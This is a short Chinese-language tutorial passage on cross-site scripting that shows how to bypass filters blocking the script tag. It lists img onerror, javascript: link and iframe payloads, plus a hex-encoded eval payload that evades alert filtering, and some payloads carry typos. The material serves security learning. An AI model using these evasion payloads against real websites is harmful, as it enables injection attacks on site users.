0×04 过滤的解决办法
假如说网站禁止过滤了script 这时该怎么办呢,记住一句话,
这是我总结出来的“xss就是在页面执行你想要的js”不用管那么多,
只要能运行我们的js就OK,比如用img标签或者a标签。我们可以这样写
- <img scr=1 onerror=alert(‘xss‘)> // 当找不到图片名为1的文件时,执行alert(‘xss‘)
- <a href=javascrip:alert(‘xss‘)>s</a> // 点击s时运行alert(‘xss‘)
- <iframe src=javascript:alert(‘xss‘);height=0 width=0 /><iframe> // 利用iframe的scr来弹窗
- <img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> // 过滤了alert来执行弹窗
等等有很多的方法,不要把思想总局限于一种上面,
记住一句话“xss就是在页面执行你想要的js”其他的管他去。(当然有的时候还有管他…)
XSS
原文:https://www.cnblogs.com/unixcs/p/10551537.html
